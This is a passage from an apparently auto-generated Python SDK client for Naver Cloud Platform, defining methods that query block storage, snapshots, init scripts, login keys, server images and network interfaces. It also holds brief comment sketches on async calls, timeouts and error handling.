This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_instance_detail(get_block_storage_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageInstanceDetailRequest get_block_storage_instance_detail_request: getBlockStorageInstanceDetailRequest (required)
:return: GetBlockStorageInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_storage_instance_detail_with_http_info(get_block_storage_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_block_storage_instance_detail_with_http_info(get_block_storage_instance_detail_request, **kwargs) # noqa: E501
return data

    def get_block_storage_instance_detail_with_http_info(self, get_block_storage_instance_detail_request, **kwargs): # noqa: E501
        """get_block_storage_instance_detail # noqa: E501

        Get block storage instance detail # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_instance_detail_with_http_info(get_block_storage_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageInstanceDetailRequest get_block_storage_instance_detail_request: getBlockStorageInstanceDetailRequest (required)
:return: GetBlockStorageInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_block_storage_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_storage_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_block_storage_instance_detail_request' is set
if ('get_block_storage_instance_detail_request' not in params or
params['get_block_storage_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_block_storage_instance_detail_request` when calling `get_block_storage_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_block_storage_instance_detail_request' in params:
body_params = params['get_block_storage_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getBlockStorageInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetBlockStorageInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
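    # Async usage sketch, mirroring the docstring example above: passing
    # async=True returns the request thread, and thread.get() blocks until the
    # GetBlockStorageInstanceDetailResponse is ready. Note that `async` is a
    # reserved word on Python 3.7+, so there the flag has to be supplied as
    # **{'async': True} rather than as a literal keyword argument.
    #
    #     thread = api.get_block_storage_instance_detail(request, **{'async': True})
    #     response = thread.get()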
def get_block_storage_instance_list(self, get_block_storage_instance_list_request, **kwargs): # noqa: E501
"""get_block_storage_instance_list # noqa: E501
        Get block storage instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_instance_list(get_block_storage_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageInstanceListRequest get_block_storage_instance_list_request: getBlockStorageInstanceListRequest (required)
:return: GetBlockStorageInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_storage_instance_list_with_http_info(get_block_storage_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_block_storage_instance_list_with_http_info(get_block_storage_instance_list_request, **kwargs) # noqa: E501
return data
def get_block_storage_instance_list_with_http_info(self, get_block_storage_instance_list_request, **kwargs): # noqa: E501
"""get_block_storage_instance_list # noqa: E501
        Get block storage instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_instance_list_with_http_info(get_block_storage_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageInstanceListRequest get_block_storage_instance_list_request: getBlockStorageInstanceListRequest (required)
:return: GetBlockStorageInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_block_storage_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_storage_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_block_storage_instance_list_request' is set
if ('get_block_storage_instance_list_request' not in params or
params['get_block_storage_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_block_storage_instance_list_request` when calling `get_block_storage_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_block_storage_instance_list_request' in params:
body_params = params['get_block_storage_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getBlockStorageInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetBlockStorageInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
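    # *_with_http_info sketch: the convenience wrapper above forces
    # _return_http_data_only=True, but calling the *_with_http_info variant
    # directly without that flag returns the full transport tuple in typical
    # swagger-codegen clients (a hedged assumption about this api_client):
    #
    #     data, status, headers = api.get_block_storage_instance_list_with_http_info(request)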
def get_block_storage_snapshot_instance_detail(self, get_block_storage_snapshot_instance_detail_request, **kwargs): # noqa: E501
"""get_block_storage_snapshot_instance_detail # noqa: E501
        Get block storage snapshot instance detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_snapshot_instance_detail(get_block_storage_snapshot_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageSnapshotInstanceDetailRequest get_block_storage_snapshot_instance_detail_request: getBlockStorageSnapshotInstanceDetailRequest (required)
:return: GetBlockStorageSnapshotInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_storage_snapshot_instance_detail_with_http_info(get_block_storage_snapshot_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_block_storage_snapshot_instance_detail_with_http_info(get_block_storage_snapshot_instance_detail_request, **kwargs) # noqa: E501
return data
def get_block_storage_snapshot_instance_detail_with_http_info(self, get_block_storage_snapshot_instance_detail_request, **kwargs): # noqa: E501
"""get_block_storage_snapshot_instance_detail # noqa: E501
        Get block storage snapshot instance detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_snapshot_instance_detail_with_http_info(get_block_storage_snapshot_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageSnapshotInstanceDetailRequest get_block_storage_snapshot_instance_detail_request: getBlockStorageSnapshotInstanceDetailRequest (required)
:return: GetBlockStorageSnapshotInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_block_storage_snapshot_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_storage_snapshot_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_block_storage_snapshot_instance_detail_request' is set
if ('get_block_storage_snapshot_instance_detail_request' not in params or
params['get_block_storage_snapshot_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_block_storage_snapshot_instance_detail_request` when calling `get_block_storage_snapshot_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_block_storage_snapshot_instance_detail_request' in params:
body_params = params['get_block_storage_snapshot_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getBlockStorageSnapshotInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetBlockStorageSnapshotInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_storage_snapshot_instance_list(self, get_block_storage_snapshot_instance_list_request, **kwargs): # noqa: E501
"""get_block_storage_snapshot_instance_list # noqa: E501
        Get block storage snapshot instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_snapshot_instance_list(get_block_storage_snapshot_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageSnapshotInstanceListRequest get_block_storage_snapshot_instance_list_request: getBlockStorageSnapshotInstanceListRequest (required)
:return: GetBlockStorageSnapshotInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_storage_snapshot_instance_list_with_http_info(get_block_storage_snapshot_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_block_storage_snapshot_instance_list_with_http_info(get_block_storage_snapshot_instance_list_request, **kwargs) # noqa: E501
return data
def get_block_storage_snapshot_instance_list_with_http_info(self, get_block_storage_snapshot_instance_list_request, **kwargs): # noqa: E501
"""get_block_storage_snapshot_instance_list # noqa: E501
        Get block storage snapshot instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_snapshot_instance_list_with_http_info(get_block_storage_snapshot_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageSnapshotInstanceListRequest get_block_storage_snapshot_instance_list_request: getBlockStorageSnapshotInstanceListRequest (required)
:return: GetBlockStorageSnapshotInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_block_storage_snapshot_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_storage_snapshot_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_block_storage_snapshot_instance_list_request' is set
if ('get_block_storage_snapshot_instance_list_request' not in params or
params['get_block_storage_snapshot_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_block_storage_snapshot_instance_list_request` when calling `get_block_storage_snapshot_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_block_storage_snapshot_instance_list_request' in params:
body_params = params['get_block_storage_snapshot_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getBlockStorageSnapshotInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetBlockStorageSnapshotInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
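    # _preload_content sketch: _preload_content=False is forwarded to
    # call_api and, in swagger-codegen style clients, skips deserialization
    # and hands back the raw HTTP response object (assumed urllib3-backed
    # here, which is the usual transport for these generated clients):
    #
    #     raw = api.get_block_storage_snapshot_instance_list(request, _preload_content=False)
    #     print(raw.status)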
def get_init_script_detail(self, get_init_script_detail_request, **kwargs): # noqa: E501
"""get_init_script_detail # noqa: E501
        Get init script detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_init_script_detail(get_init_script_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetInitScriptDetailRequest get_init_script_detail_request: getInitScriptDetailRequest (required)
:return: GetInitScriptDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_init_script_detail_with_http_info(get_init_script_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_init_script_detail_with_http_info(get_init_script_detail_request, **kwargs) # noqa: E501
return data
def get_init_script_detail_with_http_info(self, get_init_script_detail_request, **kwargs): # noqa: E501
"""get_init_script_detail # noqa: E501
        Get init script detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_init_script_detail_with_http_info(get_init_script_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetInitScriptDetailRequest get_init_script_detail_request: getInitScriptDetailRequest (required)
:return: GetInitScriptDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_init_script_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_init_script_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_init_script_detail_request' is set
if ('get_init_script_detail_request' not in params or
params['get_init_script_detail_request'] is None):
raise ValueError("Missing the required parameter `get_init_script_detail_request` when calling `get_init_script_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_init_script_detail_request' in params:
body_params = params['get_init_script_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getInitScriptDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetInitScriptDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
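    # _request_timeout sketch: the value is passed straight through to
    # call_api; swagger-codegen clients usually accept either a single number
    # or a (connect, read) pair of timeouts (an assumption, not verified
    # against this client's api_client implementation):
    #
    #     response = api.get_init_script_detail(request, _request_timeout=(3.0, 10.0))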
def get_init_script_list(self, get_init_script_list_request, **kwargs): # noqa: E501
"""get_init_script_list # noqa: E501
        Get init script list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_init_script_list(get_init_script_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetInitScriptListRequest get_init_script_list_request: getInitScriptListRequest (required)
:return: GetInitScriptListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_init_script_list_with_http_info(get_init_script_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_init_script_list_with_http_info(get_init_script_list_request, **kwargs) # noqa: E501
return data
def get_init_script_list_with_http_info(self, get_init_script_list_request, **kwargs): # noqa: E501
"""get_init_script_list # noqa: E501
        Get init script list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_init_script_list_with_http_info(get_init_script_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetInitScriptListRequest get_init_script_list_request: getInitScriptListRequest (required)
:return: GetInitScriptListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_init_script_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_init_script_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_init_script_list_request' is set
if ('get_init_script_list_request' not in params or
params['get_init_script_list_request'] is None):
raise ValueError("Missing the required parameter `get_init_script_list_request` when calling `get_init_script_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_init_script_list_request' in params:
body_params = params['get_init_script_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getInitScriptList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetInitScriptListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
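    # Error-handling sketch grounded in the validation code above: a keyword
    # outside all_params raises TypeError, and a missing or None request
    # raises ValueError, both before any HTTP request is made.
    #
    #     try:
    #         api.get_init_script_list(request, bogus_kwarg=1)
    #     except TypeError as exc:
    #         print(exc)  # "Got an unexpected keyword argument 'bogus_kwarg' ..."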
def get_login_key_list(self, get_login_key_list_request, **kwargs): # noqa: E501
"""get_login_key_list # noqa: E501
        Get login key list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_login_key_list(get_login_key_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetLoginKeyListRequest get_login_key_list_request: getLoginKeyListRequest (required)
:return: GetLoginKeyListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_login_key_list_with_http_info(get_login_key_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_login_key_list_with_http_info(get_login_key_list_request, **kwargs) # noqa: E501
return data
def get_login_key_list_with_http_info(self, get_login_key_list_request, **kwargs): # noqa: E501
"""get_login_key_list # noqa: E501
        Get login key list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_login_key_list_with_http_info(get_login_key_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetLoginKeyListRequest get_login_key_list_request: getLoginKeyListRequest (required)
:return: GetLoginKeyListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_login_key_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_login_key_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_login_key_list_request' is set
if ('get_login_key_list_request' not in params or
params['get_login_key_list_request'] is None):
raise ValueError("Missing the required parameter `get_login_key_list_request` when calling `get_login_key_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_login_key_list_request' in params:
body_params = params['get_login_key_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getLoginKeyList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetLoginKeyListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
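    # Authentication note: every call in this class declares the 'x-ncp-iam'
    # auth setting, so credentials are resolved through the shared api_client
    # configuration rather than per-call arguments. A hedged sketch (the
    # attribute names below are assumptions; see this SDK's Configuration):
    #
    #     # configuration.access_key = '<NCP access key>'
    #     # configuration.secret_key = '<NCP secret key>'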
def get_member_server_image_instance_detail(self, get_member_server_image_instance_detail_request, **kwargs): # noqa: E501
"""get_member_server_image_instance_detail # noqa: E501
        Get member server image instance detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_member_server_image_instance_detail(get_member_server_image_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetMemberServerImageInstanceDetailRequest get_member_server_image_instance_detail_request: getMemberServerImageInstanceDetailRequest (required)
:return: GetMemberServerImageInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_member_server_image_instance_detail_with_http_info(get_member_server_image_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_member_server_image_instance_detail_with_http_info(get_member_server_image_instance_detail_request, **kwargs) # noqa: E501
return data
def get_member_server_image_instance_detail_with_http_info(self, get_member_server_image_instance_detail_request, **kwargs): # noqa: E501
"""get_member_server_image_instance_detail # noqa: E501
        Get member server image instance detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_member_server_image_instance_detail_with_http_info(get_member_server_image_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetMemberServerImageInstanceDetailRequest get_member_server_image_instance_detail_request: getMemberServerImageInstanceDetailRequest (required)
:return: GetMemberServerImageInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_member_server_image_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_member_server_image_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_member_server_image_instance_detail_request' is set
if ('get_member_server_image_instance_detail_request' not in params or
params['get_member_server_image_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_member_server_image_instance_detail_request` when calling `get_member_server_image_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_member_server_image_instance_detail_request' in params:
body_params = params['get_member_server_image_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getMemberServerImageInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetMemberServerImageInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_member_server_image_instance_list(self, get_member_server_image_instance_list_request, **kwargs): # noqa: E501
"""get_member_server_image_instance_list # noqa: E501
        Get member server image instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_member_server_image_instance_list(get_member_server_image_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetMemberServerImageInstanceListRequest get_member_server_image_instance_list_request: getMemberServerImageInstanceListRequest (required)
:return: GetMemberServerImageInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_member_server_image_instance_list_with_http_info(get_member_server_image_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_member_server_image_instance_list_with_http_info(get_member_server_image_instance_list_request, **kwargs) # noqa: E501
return data
def get_member_server_image_instance_list_with_http_info(self, get_member_server_image_instance_list_request, **kwargs): # noqa: E501
"""get_member_server_image_instance_list # noqa: E501
        Get member server image instance list  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_member_server_image_instance_list_with_http_info(get_member_server_image_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetMemberServerImageInstanceListRequest get_member_server_image_instance_list_request: getMemberServerImageInstanceListRequest (required)
:return: GetMemberServerImageInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_member_server_image_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_member_server_image_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_member_server_image_instance_list_request' is set
if ('get_member_server_image_instance_list_request' not in params or
params['get_member_server_image_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_member_server_image_instance_list_request` when calling `get_member_server_image_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_member_server_image_instance_list_request' in params:
body_params = params['get_member_server_image_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getMemberServerImageInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetMemberServerImageInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_network_interface_detail(self, get_network_interface_detail_request, **kwargs): # noqa: E501
"""get_network_interface_detail # noqa: E501
        Get network interface detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_network_interface_detail(get_network_interface_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetNetworkInterfaceDetailRequest get_network_interface_detail_request: getNetworkInterfaceDetailRequest (required)
:return: GetNetworkInterfaceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_network_interface_detail_with_http_info(get_network_interface_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_network_interface_detail_with_http_info(get_network_interface_detail_request, **kwargs) # noqa: E501
return data
def get_network_interface_detail_with_http_info(self, get_network_interface_detail_request, **kwargs): # noqa: E501
"""get_network_interface_detail # noqa: E501
        Get network interface detail  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_network_interface_detail_with_http_info(get_network_interface_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetNetworkInterfaceDetailRequest get_network_interface_detail_request: getNetworkInterfaceDetailRequest (required)
:return: GetNetworkInterfaceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_network_interface_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_network_interface_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_network_interface_detail_request' is set
if ('get_network_interface_detail_request' not in params or
params['get_network_interface_detail_request'] is None):
raise ValueError("Missing the required parameter `get_network_interface_detail_request` when calling `get_network_interface_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_network_interface_detail_request' in params:
body_params = params['get_network_interface_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getNetworkInterfaceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
